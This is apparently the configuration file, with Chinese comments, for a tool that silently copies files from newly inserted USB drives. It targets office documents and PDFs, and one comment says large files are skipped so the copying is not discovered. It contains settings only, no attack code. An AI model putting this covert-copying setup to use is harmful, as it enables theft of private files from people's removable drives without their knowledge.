# 全局变量
[global]
# 工作目录
WORK_DIR = str(".\\")

# 复制模式
# 0：狂暴（全部复制,不推荐）
# 1：机智（只复制指定扩展名文件，推荐）
CLEVER_COPY = 1

# 自动退出
# 0：一直复制新插入U盘的文件，直到程序退出
# 1：插入的U盘的文件被复制完成后，程序自动退出
AUTO_EXIT = 1

# 最大复制重试次数
# 0表示不重试，最大3次
MAX_RETRY_TIME = 1

# 机智模式下，仅复制以下扩展名文件
# 一般只需要复制文档，按默认设置即可：["doc","docx","xls","xlsx","ppt","pptx","pdf","txt"]
CLEVER_FILTER = ["doc","docx","xls","xlsx","ppt","pptx","pdf","txt"]

# 狂暴模式下，不复制以下扩展名文件
# 避免复制大文件，以防被发现
RAGE_EXCLUDE = ["iso","mp4","exe"]

# 磁盘检查刷新时间，单位为秒
# 设置合理的数值以平衡CPU占用率和效率
TIME_SLEEP = 3
